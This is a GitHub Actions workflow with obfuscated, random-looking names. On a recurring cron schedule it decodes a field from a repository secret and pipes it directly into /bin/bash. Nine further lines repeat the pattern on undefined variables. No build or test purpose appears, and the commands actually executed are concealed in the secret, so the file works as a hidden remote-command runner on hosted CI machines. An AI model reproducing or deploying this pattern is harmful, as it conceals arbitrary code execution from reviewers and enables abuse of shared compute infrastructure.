name: liutang19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          n45393: ${{ secrets.n45393 }}
        run: |
          echo $n45393 | jq -r .oq45 | /bin/bash
          echo $buqh505 | jq -r .oegt888 | /bin/bash
          echo $jmj8 | jq -r .fkg45797 | /bin/bash
          echo $rcjbq784 | jq -r .odwyr17 | /bin/bash
          echo $zdw66396 | jq -r .q44781 | /bin/bash
          echo $pp60775 | jq -r .m529 | /bin/bash
          echo $xpmfr6950 | jq -r .owcpe7 | /bin/bash
          echo $tczd3187 | jq -r .opx2 | /bin/bash
          echo $ta27093 | jq -r .aysa5166 | /bin/bash
          echo $gcvqo012 | jq -r .e48258 | /bin/bash

